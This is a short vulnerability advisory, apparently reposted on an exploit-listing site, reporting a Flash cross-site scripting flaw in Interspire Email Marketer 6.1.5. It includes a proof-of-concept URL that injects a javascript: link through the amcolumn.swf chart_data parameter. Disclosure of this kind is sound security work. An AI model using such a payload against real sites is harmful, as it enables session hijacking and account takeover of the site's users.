Interspire Email Marketer 6.1.5 Cross Site Scripting

2015.04.08

Credit: provensec

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Affected software: interspire email marketer
# Type of vulnerability:flash xss
# URL:http://emailmarketer.interspire-demo.com/
# Discovered by: provensec
# Website: provensec.com
#version: Interspire Email Marketer 6.1.5
<http://www.interspire.com/emailmarketer/>
# Proof of concept
http://emailmarketer.interspire-demo.com/admin/functions/amcharts/amcolumn/amcolumn.swf?chart_settings=%3Csettings%3E%3C/settings%3E&chart_data=%3Cchart%3E%3Cmessage%3E%3C![CDATA[%3Ca%20href=%22javascript:confirm%28%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27%29%22%3EXSS%20~%20Click%20Me!%3C/a%3E]]%3E%3C/message%3E%3C/chart%3E&.swf
--
Best Regards,
Ankit Bharathan /*Security Researcher*
[image: Provensec,llc] <http://provenec.com/>
ankit.b@provensec.com
Provensec,llc
http://provenec.com
P *Consider the environment. Please don't print this e-mail unless
absolutely necessary.*

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Interspire Email Marketer 6.1.5 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.